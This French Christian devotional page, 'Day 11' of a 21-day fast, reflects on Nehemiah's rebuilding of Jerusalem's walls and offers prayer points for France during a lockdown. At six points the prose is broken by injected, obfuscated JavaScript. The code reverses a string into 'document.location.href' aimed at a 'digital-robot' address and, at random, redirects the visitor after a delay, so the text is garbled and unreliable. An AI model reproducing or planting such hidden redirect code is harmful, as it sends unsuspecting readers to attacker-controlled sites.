21 jours de Jeûne et Prière : Jour 11

Etat des lieux
Néhémie 1 et 2
Le peuple d’Israël, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout au long de son histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toire, est souvent passé par des périodes très difficiles. Et l’une d’elle est relatée dans le livre de Néhémie.
Cet homme de Dieu qui avait été déporté, était au service du roi de Perse quand l’un de ses frères est venu l’informer de l’état de la ville de Jérusalem :
« les murailles de Jérusalem sont en ruines, et ses portes sont consumées par le feu. » Néhémie 1 : 3
Cette nouvelle signifiait que le peuple était à la merci de ses ennemis, qui pouvaient, à n’importe quel moment, venir les attaquer, les opprimer et les détruire.
Lorsque nous réfléchissons à notre nation de France, nous ne pouvons que constater que ses murailles spirituelles sont en ruines et beaucoup de portes sont en cendres. Il n’y a plus de repères, les valeurs judéo-chrétiennes sont bafouées, ce qui est bien est appelé mal et ce qui est mal est appelé bien.
Conscients de cette situation, l’attitude de Néhémie doit nous inspirer :
« Lorsque j’entendis ces choses, je m’assis, je pleurai, et je fus plusieurs jours dans la désolation. Je jeûnai et je priai devant le Dieu des cieux » Néhémie 1 : 4
Puis les versets 5 à 10 nous décrivent la prière qu’il fait monter devant Dieu, prière de repentance où il demande pardon pour les péchés de son peuple en s’identifiant pleinement avec lui, et où il implore le pardon de Dieu.
Nous aussi, faisons de même ; continuons à implorer la grâce et la miséricorde de Dieu sur notre pays et ne nous lassons pas de demander son intervention.
Puis au chapitre 2, après avoir obtenu la permission du roi, Néhémie se rend à Jérusalem et à son arrivée, sans rien dire à personne, il fait un « état des lieux ».
Pendant ce temps de confinement, alors que presque tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout le pays est à l’arrêt, faisons un « état des lieux spirituels » de la France. Réfléchissons aux « murailles en ruines », demandons au Seigneur de nous éclairer. Il y a 7 grandes sphères d’influence dans tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute société du monde, qui vont modeler les pensées des peuples : la Famille, l’Eglise, le Gouvernement, l’Education, les Médias, l’Economie (ou les affaires) et les Arts et divertissements. Si l’Eglise de Jésus-Christ a peu d’influence ou n’a pas d’influence dans ces domaines essentiels de la société, ceux-ci seront envahis par d’autres valeurs et d’autres visions du monde.

Sujet de prière
Prions spécifiquement pour la France
– Dans une attitude de repentance et d’humilité, prions la prière de Néhémie et demandons pardon au Seigneur, en tant qu’Eglise de Jésus-Christ, parce que nous ne nous sommes pas impliqués suffisamment dans la vie de notre société.
– Repentobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tons-nous pour notre mentalité si étroite qui nous a maintenus pendant des années dans nos quatre murs.
– Réfléchissons et demandons au Seigneur de nous ouvrir les yeux quant aux « murailles en ruines » dans notre pays, mais aussi aux « portes en cendres ». Beaucoup de portes ont été ouvertes à l’ennemi en France, ce qui explique pourquoi le pays est dans l’état où il est.
– Prions pour que le Seigneur lève des hommes et des femmes ayant la crainte de Dieu et l’onction du Saint-Esprit, qui seront disposés, comme Néhémie, à être utilisés pour reconstruire les murailles spirituelles de la nation.
– Continuons également à intercéder pour nos autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torités, les forces de l’ordre, le personnel soignant, les familles endeuillées et souffrantes et pour l’intervention du Seigneur dans cette crise sans précédent.
Que le Saint-Esprit vous guide et vous inspire !